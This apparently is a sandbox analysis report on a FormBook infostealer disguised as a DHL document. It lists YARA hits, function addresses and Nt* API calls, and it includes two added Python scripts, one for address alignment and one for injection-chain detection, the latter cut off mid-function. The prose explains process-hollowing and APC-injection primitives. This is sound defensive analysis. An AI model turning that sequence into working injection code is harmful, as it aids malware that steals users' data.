Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rules: Formbook_1, Formbook
Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rules: Formbook_1, Formbook
Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rules: Formbook_1, Formbook
Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rules: Formbook_1, Formbook
Source: C:\Users\user\Desktop\DHL Delivery Documents.exe Code function: 2_2_00007FFC081C3C37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041C130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041C235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041C367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00408C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041A6DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041CF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013FF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01414120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014CE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0140B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0149CB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014BDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014A23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014AFA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0140D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01422581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014BD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0140841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014CDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014BD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01416E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C2EF7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05541D55
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05542D07
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05470D20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_055425DD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0548D5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054A2581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05532D82
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0553D466
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0549B477
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0548841F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05534496
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0554DFCE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05541FF1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0553D616
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05496E30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05542EF7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0547F900
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05494120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054999BF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05531002
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0554E824
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0549A830
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_055428EC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0548B090
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054A20A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_055420A8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0549AB40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0551CB4F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0549A309
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05542B28
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0553DBD2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_055303DA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054AABD8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_055223E3
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054A138B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054AEBB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0552FA2B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0549B236
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_05534AEF
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_055422AE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0314C367
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0314C130
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0314CF30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_03132FB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0314A6DA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_03132D90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_03132D88
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_03138C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 013FB150 appears 136 times
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0547B150 appears 136 times
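The two "Code function" lists above are worth reading together: the msdt.exe addresses look like the aspnet_compiler.exe addresses shifted by a constant, and the 136-hit string function moves from 013FB150 to 0547B150, a shift of exactly 0x04080000. The script below is an added example, not part of the Joe Sandbox report, that tests this properly: it copies the reported addresses, histograms every pairwise difference and reports the offsets that line many of them up. The reading that one dominant offset per region means the same code mapped at a new base is the analyst's inference, not a statement the report makes.

```python
"""Line up function starts reported for aspnet_compiler.exe (pid 7) and
msdt.exe (pid 12) to test whether they are one module mapped at two bases.

Added example, not part of the Joe Sandbox report. The addresses are copied
from the report's two "Code function" lists; the reading that one constant
offset per region means "same code, relocated" is the analyst's inference.
"""
import re
from collections import Counter

# Function starts the report lists for aspnet_compiler.exe (pid 7, round 2).
PID7 = """
7_2_00401027 7_2_00401030 7_2_0041C130 7_2_0041C235 7_2_0041C367 7_2_00408C90
7_2_00402D88 7_2_00402D90 7_2_0041A6DA 7_2_0041CF30 7_2_00402FB0 7_2_013FF900
7_2_01414120 7_2_014199BF 7_2_014B1002 7_2_014CE824 7_2_0141A830 7_2_014C28EC
7_2_0140B090 7_2_014220A0 7_2_014C20A8 7_2_0141AB40 7_2_0149CB4F 7_2_0141A309
7_2_014C2B28 7_2_014B03DA 7_2_014BDBD2 7_2_0142ABD8 7_2_014A23E3 7_2_0142138B
7_2_0142EBB0 7_2_014AFA2B 7_2_0141B236 7_2_014B4AEF 7_2_014C22AE 7_2_014C1D55
7_2_013F0D20 7_2_014C2D07 7_2_014C25DD 7_2_0140D5E0 7_2_01422581 7_2_014B2D82
7_2_014BD466 7_2_0141B477 7_2_0140841F 7_2_014B4496 7_2_014CDFCE 7_2_014C1FF1
7_2_014BD616 7_2_01416E30 7_2_014C2EF7
"""

# Function starts the report lists for msdt.exe (pid 12, round 2).
PID12 = """
12_2_05541D55 12_2_05542D07 12_2_05470D20 12_2_055425DD 12_2_0548D5E0 12_2_054A2581
12_2_05532D82 12_2_0553D466 12_2_0549B477 12_2_0548841F 12_2_05534496 12_2_0554DFCE
12_2_05541FF1 12_2_0553D616 12_2_05496E30 12_2_05542EF7 12_2_0547F900 12_2_05494120
12_2_054999BF 12_2_05531002 12_2_0554E824 12_2_0549A830 12_2_055428EC 12_2_0548B090
12_2_054A20A0 12_2_055420A8 12_2_0549AB40 12_2_0551CB4F 12_2_0549A309 12_2_05542B28
12_2_0553DBD2 12_2_055303DA 12_2_054AABD8 12_2_055223E3 12_2_054A138B 12_2_054AEBB0
12_2_0552FA2B 12_2_0549B236 12_2_05534AEF 12_2_055422AE 12_2_0314C367 12_2_0314C130
12_2_0314CF30 12_2_03132FB0 12_2_0314A6DA 12_2_03132D90 12_2_03132D88 12_2_03138C90
"""


def parse(listing):
    """Addresses from 'pid_round_ADDR' tokens, as sorted unique ints."""
    return sorted({int(a, 16) for a in
                   re.findall(r"\b\d+_\d+_([0-9A-Fa-f]{8})\b", listing)})


def delta_histogram(a, b):
    """How many (x in a, y in b) pairs each constant offset y - x explains."""
    hist = Counter()
    for x in a:
        for y in b:
            hist[y - x] += 1
    return hist


def shared_bases(a, b, min_hits=3):
    """Offsets that align at least min_hits addresses, most hits first.
    Unrelated addresses almost never agree on one difference three times,
    so a large bucket is a region that was relocated as a block."""
    return [(d, n) for d, n in delta_histogram(a, b).most_common() if n >= min_hits]


def unmatched(a, b, deltas):
    """Addresses of a that none of the offsets in `deltas` carries onto b."""
    b_set = set(b)
    return [x for x in a if not any(x + d in b_set for d in deltas)]


if __name__ == "__main__":
    a, b = parse(PID7), parse(PID12)
    bases = shared_bases(a, b)
    for delta, hits in bases:
        print(f"offset {hex(delta)}: {hits} function starts line up")
    print("pid 7 only:", [hex(x) for x in unmatched(a, b, [d for d, _ in bases])])
```

Run on the report's own numbers this gives two buckets: +0x04080000 aligns 40 starts (the 0x13Fxxxx/0x14xxxxx region of pid 7 reappears at 0x547xxxx/0x55xxxxx in pid 12, the same shift as the string function), and +0x02D30000 aligns the eight starts in the 0x400000 image region of the hollowed aspnet_compiler.exe with the 0x3130000 region of msdt.exe, which is also where the YARA memory scan above hits in dump 0000000C...03130000. Three 0x40xxxx starts have no partner in pid 12 and stay pid 7 only.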
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004185F0 NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004186A0 NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_00418720 NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004187D0 NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004185EC NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041869A NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041869F NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0041871A NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_004187CA NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014399A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014398F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014395D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014397A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014396E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439950 NtQueueApcThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014399D0 NtCreateProcessEx,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0143B040 NtSuspendThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439820 NtEnumerateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014398A0 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439B00 NtSetValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0143A3B0 NtGetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439A10 NtQuerySection,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439A80 NtOpenDirectoryObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439560 NtWriteFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439520 NtWaitForSingleObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0143AD30 NtSetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014395F0 NtQueryInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439760 NtOpenProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439770 NtSetInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0143A770 NtOpenThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0143A710 NtOpenProcessToken,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439730 NtQueryVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439650 NtQueryValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439670 NtQueryInformationProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01439610 NtEnumerateValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014396D0 NtCreateKey,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9560 NtWriteFile,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054BAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054BA770 NtOpenThread,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054BA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054BB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054BA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_054B9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_03148720 NtClose,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_031487D0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_031486A0 NtReadFile,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_031485F0 NtCreateFile,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0314871A NtClose,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_031487CA NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0314869F NtReadFile,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_0314869A NtCreateFile,
Source: C:\Windows\SysWOW64\msdt.exe Code function: 12_2_031485EC NtCreateFile,
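The Nt* wrappers listed for pid 7 and pid 12 are the primitives behind the hollowing and thread-injection behaviour this report flags: NtCreateProcessEx and NtUnmapViewOfSection to carve out a host, NtAllocateVirtualMemory plus NtWriteVirtualMemory or NtCreateSection/NtMapViewOfSection to get code in, NtSetContextThread or NtQueueApcThread to point a thread at it, and NtResumeThread to let it run. As an added example that is not part of the report or of Joe Sandbox, the script below runs a sequence detector over a constructed API-call trace; the trace format, the pids and the call order are assumptions made for the example, and the rule it implements is "foreign-memory write, then thread redirect, then resume, all against the same target process".

```python
"""Flag cross-process injection chains in an API-call trace.

Added example, not part of the sandbox report. The primitives checked are the
ones the report lists for the injected FormBook code (NtUnmapViewOfSection,
NtWriteVirtualMemory, NtMapViewOfSection, NtSetContextThread, NtQueueApcThread,
NtResumeThread); the trace format, the pids and the call order below are
constructed for the example, not taken from the report.
"""
import re
from collections import defaultdict

# Constructed trace: one call per line, "pid=<caller> api=<Nt call> target=<pid>".
# 100 hollows a suspended child 200; 200 then APC-injects into 300; 400 only
# touches its own memory and must not be flagged.
TRACE = """\
pid=100 api=NtCreateProcessEx target=200 flags=CREATE_SUSPENDED
pid=100 api=NtUnmapViewOfSection target=200
pid=100 api=NtAllocateVirtualMemory target=200
pid=100 api=NtWriteVirtualMemory target=200
pid=100 api=NtSetContextThread target=200
pid=100 api=NtResumeThread target=200
pid=200 api=NtOpenProcess target=300
pid=200 api=NtCreateSection target=200
pid=200 api=NtMapViewOfSection target=300
pid=200 api=NtQueueApcThread target=300
pid=200 api=NtResumeThread target=300
pid=400 api=NtAllocateVirtualMemory target=400
pid=400 api=NtWriteVirtualMemory target=400
pid=400 api=NtResumeThread target=400
"""

EVENT_RE = re.compile(r"pid=(\d+)\s+api=(\w+)\s+target=(\d+)")

# Stage vocabulary: get code into the target, redirect a thread to it, run it.
WRITE = {"NtWriteVirtualMemory", "NtMapViewOfSection"}
HIJACK = {"NtSetContextThread", "NtQueueApcThread"}
RUN = {"NtResumeThread"}


def parse_trace(text):
    """Return (seq, caller, api, target) tuples in trace order."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.search(line)
        if m:
            events.append((len(events), int(m.group(1)), m.group(2), int(m.group(3))))
    return events


def _first_after(calls, names, after):
    """Sequence number of the first call in `names` that occurs after `after`."""
    for seq, api in calls:
        if api in names and seq > after:
            return seq
    return None


def find_injection_chains(events):
    """One finding per (caller, target) pair showing write -> hijack -> resume
    against a foreign process, in that order. Same-process calls are ignored,
    which is what keeps ordinary allocator/JIT activity (pid 400) quiet."""
    per_pair = defaultdict(list)
    for seq, caller, api, target in events:
        if caller != target:
            per_pair[(caller, target)].append((seq, api))

    findings = []
    for (src, dst), calls in sorted(per_pair.items()):
        w = _first_after(calls, WRITE, -1)
        h = _first_after(calls, HIJACK, w) if w is not None else None
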